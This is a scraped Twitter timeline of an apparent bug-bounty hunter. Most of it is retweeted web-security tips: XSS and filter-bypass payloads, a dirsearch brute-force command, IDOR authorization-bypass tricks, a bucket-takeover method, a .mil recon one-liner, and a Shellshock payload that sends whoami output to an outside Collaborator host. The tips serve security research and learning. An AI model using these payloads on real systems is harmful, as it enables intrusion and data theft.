Tweetovi

Blokirali ste korisnika/cu @rajesh_ranjan4

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @rajesh_ranjan4

  1. Prikvačeni tweet
    10. sij

    Purchased a ticket for with my first bounty. Thanks to

    Poništi
  2. proslijedio/la je Tweet
    30. sij

    I published another blog today. This is a story about an interesting SQL Injection I found. “A Not-So-Blind RCE with SQL Injection” by Prashant Kumar

    Poništi
  3. proslijedio/la je Tweet
    10. sij

    Still after all these years my favourite XSS payload is: <iframe/src=j%0aa%0av%0aa%0as%0ac%0ar%0ai%0ap%0t:prompt `1`>

    Poništi
  4. proslijedio/la je Tweet
    14. sij

    bypass alert filter: (alert)(1) a=alert,a(2) [3].find(alert) al\u0065rt(4) alert`5` [6].map(alert) [7].every(alert) [8].filter(alert) [9].findIndex(alert) [10].forEach(alert) self['alert'](11) parent['alert'](12) window['alert'](13)

    Poništi
  5. proslijedio/la je Tweet
    27. sij

    When you're brute forcing for endpoints, don't forget to add extensions. You can also use this method to discover backup files. Here's a command I use frequently: dirsearch -e php,asp,aspx,jsp,py,txt,conf,config,bak,backup,swp,old,db,sql -u <target>

    Poništi
  6. proslijedio/la je Tweet
    26. sij

    GET /example?param=test .. nothing interesting happened, not vuln to XSS. (<> " was filtered) but if I change it to POST it's reflected as value=\"test\" POST /example#xss param=test+onfocus='alert(0)'id='xss' ..and I can haz XSS bypassing their 'filter'

    Poništi
  7. proslijedio/la je Tweet
    27. sij

    -API TIP:26/31- Looking for BOLA (IDOR) in APIs? got 401/403 errors? AuthZ bypass tricks: * Wrap ID with an array {“id”:111} --> {“id”:[111]} * JSON wrap {“id”:111} --> {“id”:{“id”:111}} * Send ID twice URL?id=<LEGIT>&id=<VICTIM> * Send wildcard {"user_id":"*"}

    Prikaži ovu nit
    Poništi
  8. proslijedio/la je Tweet
    25. sij
    Poništi
  9. proslijedio/la je Tweet
    25. sij

    Digital Ocean Bucket Takeover:- format: bucketname[.]region[.]digitaloceanspaces[.]com In Console:- Create Space, type the bucket name, make it public :) How to find? site:github[.]com intext:digitaloceanspaces[.]com

    Poništi
  10. 24. sij

    Thankyou for the stickers 😄

    Poništi
  11. 22. sij

    I just completed 's Essential Badge!!!

    Poništi
  12. proslijedio/la je Tweet
    19. sij

    1 liner to get a list of all *.mil sites for DeptOfDefense's program on crtsh %.mil | rev | cut -d "." -f 1,2 | rev | sort -u | tee -a ~/recondata/milsite.txt | grep -v "\@"

    Poništi
  13. proslijedio/la je Tweet
    13. sij
    Poništi
  14. proslijedio/la je Tweet
    13. sij
    Poništi
  15. proslijedio/la je Tweet
    10. sij

    I just published "Hunting Good Bugs with only <HTML>" I hope you enjoy this post!

    Poništi
  16. 10. sij

    I just completed 's Unix Badge!!!

    Poništi
  17. proslijedio/la je Tweet
    9. sij

    Blind SSRF with Shellshock exploitation payload: () { :; }; /usr/bin/nslookup $(whoami).tgdgspp0ee8bwyqtkrwumkotrkxalz.burpcollaborator.net ✌️

    Poništi
  18. proslijedio/la je Tweet
    9. sij
    Poništi
  19. proslijedio/la je Tweet
    7. sij

    I never share such bugs but this is however unique and had a good impact please do share .

    Poništi
  20. proslijedio/la je Tweet
    6. sij
    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·